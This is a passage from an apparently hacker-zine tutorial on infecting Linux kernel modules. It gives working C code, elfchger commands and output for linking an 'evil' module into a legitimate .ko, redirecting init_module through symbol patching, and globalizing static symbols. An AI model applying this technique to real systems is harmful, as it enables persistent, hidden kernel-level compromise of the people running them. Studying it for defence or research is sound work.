00000000 g O .gnu.linkonce.this_module 00000184 __this_module
|
|
00000040 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000040 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
The aliasing can be seen as a smart trick to allow the compiler to declare
|
|
and fill the __this_module object without too much trouble. This object is
|
|
essential for the loading of the module in the v2.6.x/3.0.x kernels.
|
|
|
|
To load the LKM, a userland tool (insmod/modprobe/etc.) calls the
|
|
sys_init_module() syscall which is defined in "kernel/module.c":
|
|
|
|
/*************************************************************************/
|
|
SYSCALL_DEFINE3(init_module, void __user *, umod,
|
|
unsigned long, len, const char __user *, uargs)
|
|
{
|
|
struct module *mod;
|
|
int ret = 0;
|
|
|
|
...
|
|
|
|
/* Do all the hard work */
|
|
mod = load_module(umod, len, uargs);
|
|
|
|
...
|
|
|
|
/* Start the module */
|
|
if (mod->init != NULL)
|
|
ret = do_one_initcall(mod->init);
|
|
...
|
|
}
|
|
/*************************************************************************/
|
|
|
|
The load_module() function returns a pointer to a "struct module" object
|
|
when the LKM is loaded in memory. As stated in the source code,
|
|
load_module() handles the main tasks associated with the loading and as
|
|
such is neither easy to follow nor to explain in a few sentences. However
|
|
there are two important things that you should know:
|
|
|
|
- load_module() is responsible for the ELF relocations
|
|
- the mod->init is holding the relocated value stored in __this_module
|
|
|
|
Note: Because __this_module is holding initialized function pointers (the
|
|
address of init() and clean() in our example), there has to be a relocation
|
|
at some point.
|
|
|
|
After the relocation is performed, mod->init() refers to the kernel mapping
|
|
of init_module() and can be called through do_one_initcall() which is
|
|
defined in "init/main.c":
|
|
|
|
/*************************************************************************/
|
|
int __init_or_module do_one_initcall(initcall_t fn)
|
|
{
|
|
int count = preempt_count();
|
|
int ret;
|
|
|
|
if (initcall_debug)
|
|
ret = do_one_initcall_debug(fn); <-- init_module() may be
|
|
else called here
|
|
ret = fn(); <-- or it may be called
|
|
here
|
|
msgbuf[0] = 0;
|
|
|
|
...
|
|
|
|
return ret;
|
|
}
|
|
/*************************************************************************/
|
|
|
|
|
|
---[ 2.3 - The relocation process
|
|
|
|
|
|
The relocation itself is handled by the load_module() function and without
|
|
any surprise the existence of the corresponding entries can be found in the
|
|
binary:
|
|
|
|
$ objdump -r orig.ko
|
|
|
|
./orig.ko: file format elf32-i386
|
|
|
|
...
|
|
|
|
RELOCATION RECORDS FOR [.gnu.linkonce.this_module]:
|
|
OFFSET TYPE VALUE
|
|
000000d4 R_386_32 init_module
|
|
00000174 R_386_32 cleanup_module
|
|
|
|
This means that the relocation has to patch two 32-bit addresses (because
|
|
type == R_386_32) located at:
|
|
|
|
- (&.gnu.linkonce.this_module = &__this_module) + 0xd4 [patch #1]
|
|
- (&.gnu.linkonce.this_module = &__this_module) + 0x174 [patch #2]
|
|
|
|
A relocation entry (in a 32-bit environment) is an Elf32_Rel object and
|
|
is defined in "/usr/include/elf.h":
|
|
|
|
/*************************************************************************/
|
|
typedef struct
|
|
{
|
|
Elf32_Addr r_offset; /* Address */
|
|
Elf32_Word r_info; /* Relocation type and symbol index
|
|
*/
|
|
} Elf32_Rel;
|
|
|
|
#define ELF32_R_SYM(val) ((val) >> 8)
|
|
/*************************************************************************/
|
|
|
|
The important thing to remember is that the symbol is located using
|
|
ELF32_R_SYM() which provides an index in the table of symbols, the .symtab
|
|
section.
|
|
|
|
This can be easily seen:
|
|
|
|
$ readelf -S ./orig.ko | grep gnu.linkonce
|
|
[10] .gnu.linkonce.thi PROGBITS 00000000 000240 000184 00 WA 0 0 32
|
|
[11] .rel.gnu.linkonce REL 00000000 0007f8 000010 08 16 10 4
|
|
|
|
The relocation section associated with section 10 is thus section 11.
|
|
|
|
$ readelf -x 11 orig.ko
|
|
|
|
Hex dump of section '.rel.gnu.linkonce.this_module':
|
|
0x00000000 d4000000 01160000 74010000 01150000 ........t.......
|
|
|
|
So ELF32_R_SYM() is returning 0x16 (=22) for the first relocation and 0x15
|
|
(=21) for the second one. Now let's see the table of symbols:
|
|
|
|
$ readelf -s orig.ko
|
|
|
|
Symbol table '.symtab' contains 33 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
|
|
|
|
...
|
|
|
|
21: 00000040 25 FUNC GLOBAL DEFAULT 2 cleanup_module
|
|
22: 00000020 27 FUNC GLOBAL DEFAULT 2 init_module
|
|
|
|
...
|
|
|
|
This is a perfect match. So when the LKM is loaded:
|
|
|
|
- The kernel performs a symbol resolution and the corresponding symbols
|
|
are updated with a new value. At this point init_module and
|
|
cleanup_module are holding kernel space addresses.
|
|
|
|
- The kernel performs the required relocations using the index in the
|
|
table of symbols to know which value to patch in. Once the relocations are
|
|
performed, __this_module has been patched twice.
|
|
|
|
At this point it should be clear that the address value of the init_module
|
|
symbol has to be modified if we want to call evil() instead of init().
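
To make the patching step more concrete, here is roughly what applying one
R_386_32 entry boils down to. This is a simplified sketch written for
illustration, not a copy of the kernel's arch-specific relocation code:

/*************************************************************************/
/* R_386_32: the 32-bit word at (section base + r_offset) gets the
 * resolved symbol value added to the addend already stored in place
 * ("S + A" in ELF terms).
 */
#include <elf.h>
#include <stdint.h>

static void apply_r_386_32(uint8_t *sec_base, const Elf32_Rel *rel,
                           const Elf32_Sym *symtab)
{
        uint32_t *where = (uint32_t *)(sec_base + rel->r_offset);

        /* ELF32_R_SYM(r_info) selects the .symtab entry to use */
        *where += symtab[ELF32_R_SYM(rel->r_info)].st_value;
}
/*************************************************************************/

Here sec_base is the mapping of .gnu.linkonce.this_module, r_offset is 0xd4
(or 0x174), and st_value is the address the init_module (or cleanup_module)
symbol resolved to.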
|
|
|
|
|
|
---[ 3 - Playing with loadable kernel modules on 2.6.x/3.0.x
|
|
|
|
|
|
As pointed out above, the address of the init_module symbol has to be
|
|
modified in order to invoke the evil() function at loading time. Since the
|
|
LKM is a relocatable object, this address is calculated using the offset
|
|
(or relative address) stored in the st_value field of the Elf32_Sym
|
|
structure [2], defined in "/usr/include/elf.h":
|
|
|
|
/*************************************************************************/
|
|
typedef struct
|
|
{
|
|
Elf32_Word st_name; /* Symbol name (string tbl index) */
|
|
Elf32_Addr st_value; /* Symbol value */
|
|
Elf32_Word st_size; /* Symbol size */
|
|
unsigned char st_info; /* Symbol type and binding */
|
|
unsigned char st_other; /* Symbol visibility */
|
|
Elf32_Section st_shndx; /* Section index */
|
|
} Elf32_Sym;
|
|
/*************************************************************************/
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
orig.ko: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
|
|
...
|
|
|
|
00000040 g F .text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
The objdump output shows that:
|
|
|
|
- the relative address of evil() is 0x00000040;
|
|
- the relative address of init_module() is 0x00000020;
|
|
- the relative address of init() is 0x00000020;
|
|
|
|
Altering these offsets is enough to have evil() called instead of
|
|
init_module() because the relocation process in the kernel will produce the
|
|
corresponding "poisoned" virtual address.
|
|
|
|
The orig.ko has to look like this:
|
|
|
|
00000040 g F .text 0000001b evil
|
|
...
|
|
00000040 g F .text 0000001b init_module
|
|
|
|
To do so, we can use my 'elfchger' script in order to modify the ELF file.
|
|
The code structure is the same as truff's one, with some minor changes.
|
|
The script takes the following input parameters:
|
|
|
|
./elfchger -s [symbol] -v [value] <module_name>
|
|
|
|
Where [value] represents the new relative address of the [symbol]
|
|
(init_module in our case) in <module_name>.
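
In essence, all such a tool has to do is locate the named symbol in .symtab
and overwrite its st_value. The following is a stripped-down sketch of that
core logic; it is an illustration only (not the actual elfchger source),
with error checking omitted and a well-formed 32-bit little-endian object
assumed:

/************************* patch-st-value.c (sketch) *********************/
/* usage: ./patch-st-value <file.ko> <symbol> <hex value> */
#include <elf.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        if (argc != 4) {
                fprintf(stderr, "usage: %s <file.ko> <symbol> <hex value>\n",
                        argv[0]);
                return 1;
        }

        int fd = open(argv[1], O_RDWR);
        struct stat st;
        fstat(fd, &st);

        /* map the object read/write so the patch goes straight to the file */
        uint8_t *map = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE,
                            MAP_SHARED, fd, 0);

        Elf32_Ehdr *ehdr = (Elf32_Ehdr *)map;
        Elf32_Shdr *shdr = (Elf32_Shdr *)(map + ehdr->e_shoff);

        /* find .symtab; its sh_link points to the matching string table */
        Elf32_Shdr *symtab = NULL;
        for (int i = 0; i < ehdr->e_shnum; i++)
                if (shdr[i].sh_type == SHT_SYMTAB)
                        symtab = &shdr[i];

        Elf32_Sym *sym = (Elf32_Sym *)(map + symtab->sh_offset);
        char *strtab = (char *)(map + shdr[symtab->sh_link].sh_offset);
        int nsyms = symtab->sh_size / sizeof(Elf32_Sym);
        unsigned long newval = strtoul(argv[3], NULL, 16);

        for (int i = 0; i < nsyms; i++) {
                if (strcmp(strtab + sym[i].st_name, argv[2]) == 0) {
                        printf("patching %s: 0x%08x -> 0x%08lx\n", argv[2],
                               (unsigned int)sym[i].st_value, newval);
                        sym[i].st_value = newval;
                        break;
                }
        }

        munmap(map, st.st_size);
        close(fd);
        return 0;
}
/******************************** EOF ************************************/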
|
|
|
|
Let's apply it to our example:
|
|
|
|
$ ./elfchger -s init_module -v 00000040 orig.ko
|
|
[+] Opening orig.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x77c
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x7a4
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x99c
|
|
>> Index in symbol table: 0x16
|
|
[+] Replacing 0x00000020 with 0x00000040... done!
|
|
|
|
The ELF file is now changed:
|
|
|
|
$ objdump -t orig.ko
|
|
|
|
orig.ko: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
...
|
|
|
|
00000040 g F .text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000040 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
Let's load the module:
|
|
|
|
$ sudo insmod orig.ko
|
|
|
|
$ dmesg | tail
|
|
...
|
|
|
|
[ 5733.929286] Init Inject!
|
|
|
|
$
|
|
|
|
As expected the evil() function is invoked instead of init() when the
|
|
module is loaded.
|
|
|
|
|
|
---[ 3.1 - A first example of code injection
|
|
|
|
The next step is the injection of external code inside the original module
|
|
(orig.ko). A new kernel module (evil.ko) will be injected into orig.ko.
|
|
We will use both orig.c and evil.c source codes:
|
|
|
|
/***************************** orig.c ************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
int init(void) {
|
|
|
|
printk(KERN_ALERT "Init Original!");
|
|
|
|
return 0;
|
|
}
|
|
|
|
void clean(void) {
|
|
|
|
printk(KERN_ALERT "Exit Original!");
|
|
|
|
return;
|
|
}
|
|
|
|
module_init(init);
|
|
module_exit(clean);
|
|
/******************************** EOF ************************************/
|
|
|
|
/***************************** evil.c ************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
int evil(void) {
|
|
|
|
printk(KERN_ALERT "Init Inject!");
|
|
|
|
return 0;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
Once the two modules orig.ko and evil.ko are compiled, they can be linked
|
|
together using the 'ld -r' command (as explained by truff) because they are
|
|
both relocatable objects.
|
|
|
|
$ ld -r orig.ko evil.ko -o new.ko
|
|
$ objdump -t new.ko
|
|
|
|
new.ko: file format elf32-i386
|
|
|
|
SYMBOL TABLE:
|
|
...
|
|
|
|
00000040 g F .text 0000001b evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 g F .text 00000019 clean
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000020 g F .text 0000001b init
|
|
|
|
The evil() function has now been linked into the new.ko module. The next
|
|
step is to make init_module() (defined in orig.ko) an alias of evil()
|
|
(defined in evil.ko). It can be done easily using ./elfchger:
|
|
|
|
$ ./elfchger -s init_module -v 00000040 new.ko
|
|
[+] Opening new.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x954
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x97c
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0xbe4
|
|
>> Index in symbol table: 0x1d
|
|
[+] Replacing 0x00000020 with 0x00000040... done!
|
|
|
|
At this point the module can be renamed and loaded:
|
|
|
|
$ mv new.ko orig.ko
|
|
$ sudo insmod orig.ko
|
|
$ dmesg | tail
|
|
...
|
|
[ 6791.920363] Init Inject!
|
|
|
|
And the magic occurs :)
|
|
|
|
As already explained by truff, if we want the original module to work
|
|
properly, we need to call its initialization function. This can be done
|
|
using an imported symbol. The init()
|
|
function is declared as extern: this means that it will be resolved at
|
|
linking time. We use the following code:
|
|
|
|
/****************************** evil.c ***********************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
extern int init();
|
|
|
|
int evil(void) {
|
|
|
|
init();
|
|
printk(KERN_ALERT "Init Inject!");
|
|
|
|
/* do something */
|
|
|
|
return 0;
|
|
}
|
|
/******************************** EOF ************************************/
|
|
|
|
And it works:
|
|
|
|
$ dmesg | tail
|
|
...
|
|
[ 7910.392244] Init Original!
|
|
[ 7910.392248] Init Inject!
|
|
|
|
|
|
---[ 4 - Real World: Is it so simple?
|
|
|
|
|
|
In this section it will be shown why the method described above may not
|
|
work when used in real life. In fact, the example modules were overly
|
|
simplified for a better understanding of the basic idea of module
|
|
infection.
|
|
|
|
|
|
---[ 4.1 - Static functions
|
|
|
|
|
|
The majority of Linux system modules are a little bit different from those
|
|
used above. Here is a more accurate example:
|
|
|
|
/***************************** orig.c ************************************/
|
|
#include <linux/init.h>
|
|
#include <linux/module.h>
|
|
#include <linux/kernel.h>
|
|
#include <linux/errno.h>
|
|
|
|
MODULE_LICENSE("GPL");
|
|
|
|
static int init(void) {
|
|
|
|
printk(KERN_ALERT "Init Original!");
|
|
|
|
return 0;
|
|
}
|
|
|
|
static void clean(void) {
|
|
|
|
printk(KERN_ALERT "Exit Original!");
|
|
|
|
return;
|
|
}
|
|
|
|
module_init(init);
|
|
module_exit(clean);
|
|
/******************************** EOF ************************************/
|
|
|
|
Let's try to use our method to inject the old evil code inside this new
|
|
orig module.
|
|
|
|
$ ld -r orig.ko evil.ko -o new.ko
|
|
$ sudo insmod new.ko
|
|
insmod: error inserting 'new.ko': -1 Unknown symbol in module
|
|
|
|
What? More information is needed:
|
|
|
|
$ dmesg | tail
|
|
...
|
|
[ 2737.539906] orig: Unknown symbol init (err 0)
|
|
|
|
The unknown symbol appears to be init. To understand the reason why init is
|
|
"unknown" let's have a look at the symbol table of new.ko:
|
|
|
|
$ objdump -t new.ko
|
|
|
|
...
|
|
|
|
SYMBOL TABLE:
|
|
...
|
|
|
|
00000000 l F .text 00000019 clean
|
|
00000020 l F .text 0000001b init
|
|
|
|
...
|
|
|
|
00000040 g F .text 00000020 evil
|
|
00000000 g O .gnu.linkonce.this_module 00000174 __this_module
|
|
00000000 g F .text 00000019 cleanup_module
|
|
00000020 g F .text 0000001b init_module
|
|
00000000 *UND* 00000000 mcount
|
|
00000000 *UND* 00000000 printk
|
|
00000000 *UND* 00000000 init
|
|
|
|
This output shows that there are now two "init" symbols, one of them not
|
|
being defined (*UND*). This means that the linker did not correctly
|
|
link the init reference in evil.ko against the init defined in orig.ko. As
|
|
a result, when the module is loaded, the kernel tries to find the init
|
|
symbol, but since it is not defined anywhere it fails to do so and the
|
|
module is not loaded.
|
|
|
|
|
|
---[ 4.1.1 - Local symbol
|
|
|
|
The 'readelf' tool can give us more insight:
|
|
|
|
$ readelf -s orig.ko
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
...
|
|
14: 00000020 27 FUNC LOCAL DEFAULT 2 init
|
|
...
|
|
|
|
To summarize, we know about the init symbol that:
|
|
|
|
- its relative address is 0x00000020;
|
|
- its type is a function;
|
|
- its binding is local;
|
|
|
|
The symbol binding is now local (while it was previously global) since the
|
|
init function is now declared 'static' in orig.c. This has the effect of
|
|
reducing its scope to the file in which it is declared. For this reason the
|
|
symbol was not properly resolved by the linker. We need to do something in
|
|
order to change the scope of init, otherwise the injection won't work.
|
|
|
|
|
|
---[ 4.1.2 - Changing symbol binding
|
|
|
|
|
|
It's possible to change a symbol binding using the 'objcopy' tool. In fact
|
|
the '--globalize-symbol' option can be used to give global scoping to the
|
|
specified symbol:
|
|
|
|
$ objcopy --globalize-symbol=init ./orig.ko orig2.ko
|
|
|
|
But if, for some reason, objcopy is not present, the tool that I wrote can
|
|
also globalize a particular symbol by modifying all the necessary fields
|
|
inside the ELF file.
|
|
|
|
Each symbol table entry in the .symtab section is defined as follows [2]:
|
|
|
|
/*************************************************************************/
|
|
typedef struct
|
|
{
|
|
Elf32_Word st_name; /* Symbol name (string tbl index) */
|
|
Elf32_Addr st_value; /* Symbol value */
|
|
Elf32_Word st_size; /* Symbol size */
|
|
unsigned char st_info; /* Symbol type and binding */
|
|
unsigned char st_other; /* Symbol visibility */
|
|
Elf32_Section st_shndx; /* Section index */
|
|
} Elf32_Sym;
|
|
/*************************************************************************/
|
|
|
|
First, it's necessary to find in the ELF file the symbol we are looking for
|
|
(init) and check if it has a global or a local binding. The function
|
|
ElfGetSymbolByName() searches for the offset at which the init symbol is
|
|
located in .symtab and fills the corresponding "Elf32_Sym sym" structure.
|
|
Next, the binding type must be checked by looking at the st_info field.
|
|
Passing sym.st_info to the macro ELF32_ST_BIND() defined in "<elf.h>",
|
|
returns the expected binding value.
|
|
|
|
If the symbol has a local binding, these steps have to be performed:
|
|
|
|
1. Reorder the symbols: the symbol we are interested in must be placed
|
|
among the global symbols inside the .symtab section. We'll see later why
|
|
this step is mandatory. We need to move the init symbol from:
|
|
|
|
$ readelf -s orig.ko
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
|
|
1: 00000000 0 SECTION LOCAL DEFAULT 1
|
|
2: 00000000 0 SECTION LOCAL DEFAULT 2
|
|
3: 00000000 0 SECTION LOCAL DEFAULT 4
|
|
4: 00000000 0 SECTION LOCAL DEFAULT 5
|
|
5: 00000000 0 SECTION LOCAL DEFAULT 6
|
|
6: 00000000 0 SECTION LOCAL DEFAULT 8
|
|
7: 00000000 0 SECTION LOCAL DEFAULT 9
|
|
8: 00000000 0 SECTION LOCAL DEFAULT 10
|
|
9: 00000000 0 SECTION LOCAL DEFAULT 12
|
|
10: 00000000 0 SECTION LOCAL DEFAULT 13
|
|
11: 00000000 0 SECTION LOCAL DEFAULT 14
|
|
12: 00000000 0 FILE LOCAL DEFAULT ABS orig.c
|
|
13: 00000000 25 FUNC LOCAL DEFAULT 2 clean
|
|
|
|
14: 00000020 27 FUNC LOCAL DEFAULT 2 init <-----
|
|
|
|
15: 00000000 12 OBJECT LOCAL DEFAULT 5 __mod_license6
|
|
16: 00000000 0 FILE LOCAL DEFAULT ABS orig.mod.c
|
|
17: 00000020 35 OBJECT LOCAL DEFAULT 5 __mod_srcversion31
|
|
18: 00000043 9 OBJECT LOCAL DEFAULT 5 __module_depends
|
|
19: 00000000 192 OBJECT LOCAL DEFAULT 8 ____versions
|
|
20: 00000060 59 OBJECT LOCAL DEFAULT 5 __mod_vermagic5
|
|
21: 00000000 372 OBJECT GLOBAL DEFAULT 10 __this_module
|
|
22: 00000000 25 FUNC GLOBAL DEFAULT 2 cleanup_module
|
|
23: 00000020 27 FUNC GLOBAL DEFAULT 2 init_module
|
|
24: 00000000 0 NOTYPE GLOBAL DEFAULT UND mcount
|
|
25: 00000000 0 NOTYPE GLOBAL DEFAULT UND printk
|
|
|
|
To:
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
|
|
1: 00000000 0 SECTION LOCAL DEFAULT 1
|
|
2: 00000000 0 SECTION LOCAL DEFAULT 2
|
|
3: 00000000 0 SECTION LOCAL DEFAULT 4
|
|
4: 00000000 0 SECTION LOCAL DEFAULT 5
|
|
5: 00000000 0 SECTION LOCAL DEFAULT 6
|
|
6: 00000000 0 SECTION LOCAL DEFAULT 8
|
|
7: 00000000 0 SECTION LOCAL DEFAULT 9
|
|
8: 00000000 0 SECTION LOCAL DEFAULT 10
|
|
9: 00000000 0 SECTION LOCAL DEFAULT 12
|
|
10: 00000000 0 SECTION LOCAL DEFAULT 13
|
|
11: 00000000 0 SECTION LOCAL DEFAULT 14
|
|
12: 00000000 0 FILE LOCAL DEFAULT ABS orig.c
|
|
13: 00000000 25 FUNC LOCAL DEFAULT 2 clean
|
|
14: 00000000 12 OBJECT LOCAL DEFAULT 5 __mod_license6
|
|
15: 00000000 0 FILE LOCAL DEFAULT ABS orig.mod.c
|
|
16: 00000020 35 OBJECT LOCAL DEFAULT 5 __mod_srcversion31
|
|
17: 00000043 9 OBJECT LOCAL DEFAULT 5 __module_depends
|
|
18: 00000000 192 OBJECT LOCAL DEFAULT 8 ____versions
|
|
19: 00000060 59 OBJECT LOCAL DEFAULT 5 __mod_vermagic5
|
|
|
|
20: 00000020 27 FUNC GLOBAL DEFAULT 2 init <-----
|
|
|
|
21: 00000000 372 OBJECT GLOBAL DEFAULT 10 __this_module
|
|
22: 00000000 25 FUNC GLOBAL DEFAULT 2 cleanup_module
|
|
23: 00000020 27 FUNC GLOBAL DEFAULT 2 init_module
|
|
24: 00000000 0 NOTYPE GLOBAL DEFAULT UND mcount
|
|
25: 00000000 0 NOTYPE GLOBAL DEFAULT UND printk
|
|
|
|
This task is accomplished by the "ReorderSymbols()" function.
|
|
|
|
2. Updating the information about the init symbol (i.e. its offset, index,
|
|
etc.) according to its new position inside the .symtab section.
|
|
|
|
3. Changing the symbol binding from local to global by modifying the
|
|
st_info field using the ELF32_ST_INFO macro:
|
|
|
|
#define ELF32_ST_INFO(b, t) (((b)<<4)+((t)&0xf))
|
|
|
|
Where 'b' is the symbol binding and 't' the symbol type.
|
|
The binding values are:
|
|
|
|
Name Value
|
|
==== =====
|
|
STB_LOCAL 0
|
|
STB_GLOBAL 1
|
|
STB_WEAK 2
|
|
STB_LOPROC 13
|
|
STB_HIPROC 15
|
|
|
|
Obviously, STB_GLOBAL has to be used for our purpose.
|
|
|
|
The type values are:
|
|
|
|
Name Value
|
|
==== =====
|
|
STT_NOTYPE 0
|
|
STT_OBJECT 1
|
|
STT_FUNC 2
|
|
STT_SECTION 3
|
|
STT_FILE 4
|
|
STT_LOPROC 13
|
|
STT_HIPROC 15
|
|
|
|
The STT_FUNC is the type value to specify functions.
|
|
|
|
So, the resulting macro will be:
|
|
|
|
ELF32_ST_INFO(STB_GLOBAL, STT_FUNC);
|
|
|
|
The init st_info field should then be set equal to the macro's result.
|
|
|
|
4. Updating the symtab section header, defined as:
|
|
|
|
typedef struct {
|
|
Elf32_Word sh_name;
|
|
Elf32_Word sh_type;
|
|
Elf32_Word sh_flags;
|
|
Elf32_Addr sh_addr;
|
|
Elf32_Off sh_offset;
|
|
Elf32_Word sh_size;
|
|
Elf32_Word sh_link;
|
|
Elf32_Word sh_info;
|
|
Elf32_Word sh_addralign;
|
|
Elf32_Word sh_entsize;
|
|
} Elf32_Shdr;
|
|
|
|
The header can be output by the 'readelf -e' command:
|
|
|
|
$ readelf -e orig.ko
|
|
|
|
ELF Header:
|
|
|
|
...
|
|
|
|
Section Headers:
|
|
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
|
|
...
|
|
[15] .shstrtab STRTAB 00000000 00040c 0000ae 00 0 0 1
|
|
[16] .symtab SYMTAB 00000000 0007dc 0001a0 10 17 21 4
|
|
[17] .strtab STRTAB 00000000 00097c 0000a5 00 0 0 1
|
|
|
|
The value of the information (sh_info) field (reported as 'Inf')
|
|
depends on the section header type (sh_type):
|
|
|
|
sh_type sh_link sh_info
|
|
======= ======= =======
|
|
SHT_DYNAMIC The section header index of 0
|
|
the string table used by
|
|
entries in the section.
|
|
SHT_HASH The section header index of 0
|
|
the symbol table to which the
|
|
hash table applies.
|
|
SHT_REL, The section header index of The section header index of
|
|
SHT_RELA the associated symbol table. the section to which the
|
|
relocation applies.
|
|
SHT_SYMTAB, The section header index of One greater than the symbol
|
|
SHT_DYNSYM the associated string table. table index of the last
|
|
local symbol (binding
|
|
STB_LOCAL).
|
|
other SHN_UNDEF 0
|
|
|
|
The sh_info must be updated according to the rules of the SHT_SYMTAB
|
|
type. In our example, its value will be 20 = 19 + 1 (remember that our
|
|
symbol will be placed after the "__mod_vermagic5" symbol, whose entry
|
|
number is 19). This is the reason why reordering the symbol list (step 1)
|
|
is a necessary step.
|
|
|
|
All these tasks are accomplished by the tool I wrote by using this option:
|
|
|
|
./elfchger -g [symbol] <module_name>
|
|
|
|
Where [symbol] is the name of the symbol whose binding has to be modified.
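
The heart of the binding change (steps 3 and 4) fits in a few lines. The
sketch below is illustrative rather than the actual elfchger code: it
assumes the Elf32_Sym entry and the .symtab section header have already
been located (for instance as in the earlier sketch), and that the
reordering of step 1 has been done, with 'last_local' holding the index of
the last remaining local symbol:

/*************************************************************************/
/* Sketch only: flip a local symbol to global and keep the SHT_SYMTAB
 * bookkeeping consistent (sh_info = index of last local symbol + 1).
 */
#include <elf.h>

static void globalize_symbol(Elf32_Sym *sym, Elf32_Shdr *symtab_hdr,
                             Elf32_Word last_local)
{
        if (ELF32_ST_BIND(sym->st_info) == STB_LOCAL) {
                /* keep the original type (STT_FUNC for init), change
                 * only the binding */
                sym->st_info = ELF32_ST_INFO(STB_GLOBAL,
                                             ELF32_ST_TYPE(sym->st_info));

                /* one greater than the index of the last local symbol */
                symtab_hdr->sh_info = last_local + 1;
        }
}
/*************************************************************************/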
|
|
|
|
|
|
---[ 4.1.3 - Try again
|
|
|
|
|
|
At this point we can try another test, in which the developed tool will be
|
|
used. The two modules (orig.c and evil.c) and the Makefile remain the same.
|
|
|
|
The first step is to change the init binding from 'local' to 'global'. The
|
|
outcome of the elfchger script can be checked by looking at readelf's
|
|
output before and after its use. Before running the script readelf outputs:
|
|
|
|
$ readelf -a orig.ko
|
|
|
|
...
|
|
|
|
Section Headers:
|
|
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
|
|
...
|
|
[16] .symtab SYMTAB 00000000 0007dc 0001a0 10 17 21 4
|
|
|
|
...
|
|
|
|
Symbol table '.symtab' contains 26 entries:
|
|
Num: Value Size Type Bind Vis Ndx Name
|
|
...
|
|
10: 00000000 0 SECTION LOCAL DEFAULT 13
|
|
11: 00000000 0 SECTION LOCAL DEFAULT 14
|
|
12: 00000000 0 FILE LOCAL DEFAULT ABS orig.c
|
|
13: 00000000 25 FUNC LOCAL DEFAULT 2 clean
|
|
14: 00000020 27 FUNC LOCAL DEFAULT 2 init
|
|
...
|
|
21: 00000000 372 OBJECT GLOBAL DEFAULT 10 __this_module
|
|
22: 00000000 25 FUNC GLOBAL DEFAULT 2 cleanup_module
|
|
...
|
|
|
|
Let's run the script on the orig.ko file:
|
|
|
|
$ ./elfchger -g init orig.ko
|
|
[+] Opening orig.ko file...
|
|
[+] Reading Elf header...
|
|
>> Done!
|
|
[+] Finding ".symtab" section...
|
|
>> Found at 0x73c
|
|
[+] Finding ".strtab" section...
|
|
>> Found at 0x764
|
|
[+] Getting symbol' infos:
|
|
>> Symbol found at 0x8bc
|
|
>> Index in symbol table: 0xe
|
|
[+] Reordering symbols:
|
|
>> Starting:
|
|
>> Moving symbol from f to e
|
|
>> Moving symbol from 10 to f
|
|
>> Moving symbol from 11 to 10
|
|
>> Moving symbol from 12 to 11
|
|
>> Moving symbol from 13 to 12
|
|
>> Moving symbol from 14 to 13
|
|
>> Moving our symbol from 14 to 14
|
|
>> Last LOCAL symbol: 0x14
|
|
>> Done!
|
|
[+] Updating symbol' infos:
|
|
>> Symbol found at 0x91c
|
|
>> Index in symbol table: 0x14
|
|
>> Replacing flag 'LOCAL' located at 0x928 with 'GLOBAL'
|
|
[+] Updating symtab infos at 0x73c
|
|
|
|
Let's see what happened:
|
|
|
|
$ readelf -a orig.ko
|
|
|
|
...
|
|
|
|
Section Headers:
|
|
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
|
|
...
|
|
[16] .symtab SYMTAB 00000000 0007dc 0001a0 10 17 20 4
|
|
[17] .strtab STRTAB 00000000 00097c 0000a5 00 0 0 1
|
|
